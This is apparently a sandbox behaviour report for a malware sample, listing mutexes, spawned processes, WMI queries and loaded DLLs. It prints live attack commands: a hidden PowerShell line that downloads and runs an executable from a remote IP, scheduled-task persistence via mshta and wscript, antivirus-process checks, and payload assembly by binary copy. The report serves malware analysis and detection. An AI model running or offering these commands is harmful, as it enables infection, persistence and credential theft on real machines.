                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4396
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:168:WilStaging_02
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1884:168:WilStaging_02
                                Source: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exeMutant created: \Sessions\1\BaseNamedObjects\lEoISSVmRadFCSkwWUcz
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:304:WilStaging_02
                                Source: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exeMutant created: \Sessions\1\BaseNamedObjects\MVHEBzjxKloGkPj
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1884:64:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1500:64:WilError_03
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:304:WilStaging_02
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6108:304:WilStaging_02
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeFile created: C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.htaJump to behavior
                                Source: QkRFz2sau5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22322252683.0000000005A24000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22321854326.0000000005AA3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22324679118.00000000059E3000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323036090.0000000005AA6000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22323709831.0000000005AA6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                Source: 9c1024a1f1.exe, 0000000F.00000003.22339269544.0000000005AA2000.00000004.00000800.00020000.00000000.sdmp, 9c1024a1f1.exe, 0000000F.00000003.22339655455.00000000059F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                                Source: QkRFz2sau5.exeVirustotal: Detection: 54%
                                Source: QkRFz2sau5.exeReversingLabs: Detection: 50%
                                Source: Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                Source: unknownProcess created: C:\Users\user\Desktop\QkRFz2sau5.exe "C:\Users\user\Desktop\QkRFz2sau5.exe"
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /f
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE"
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 936
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 908
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe"
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe"
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.htaJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE" Jump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeProcess created: unknown unknown
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe"
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edgegdi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
